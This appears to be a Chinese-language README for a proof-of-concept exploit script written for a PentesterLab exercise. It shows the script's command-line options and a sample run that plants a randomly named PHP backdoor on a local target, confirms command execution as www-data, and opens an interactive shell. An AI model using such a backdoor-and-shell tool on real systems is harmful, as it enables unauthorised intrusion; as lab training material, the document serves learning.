为 PentesterLab 编写
如果你是 PentesterLab 的用户,请不要作弊,自己学习会好得多。
希望对某人有用,即使只是对未来的我 :)
带有交互式 Shell,还有不错的 argparse 功能
usage: poc.py [-h] [--target TARGET] [--backdoor BACKDOOR] [--proxy] [--raw] [--no-color]
options:
-h, --help 显示此帮助信息并退出
--target TARGET 目标 URL
--backdoor BACKDOOR 后门路径
--proxy 使用本地代理
--raw 显示原始输出
--no-color 禁用彩色输出
$ python3 poc.py --target http://localhost:8000 --proxy
[+] 使用随机后门名称:caxvcs009f.php
[+] 向目标发送利用代码...
[+] 测试后门...
[+] 后门生效!测试输出:uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] 启动交互式 Shell...
[+] 输入 "exit" 退出
--------------------------------------------------
shell> whoami
www-data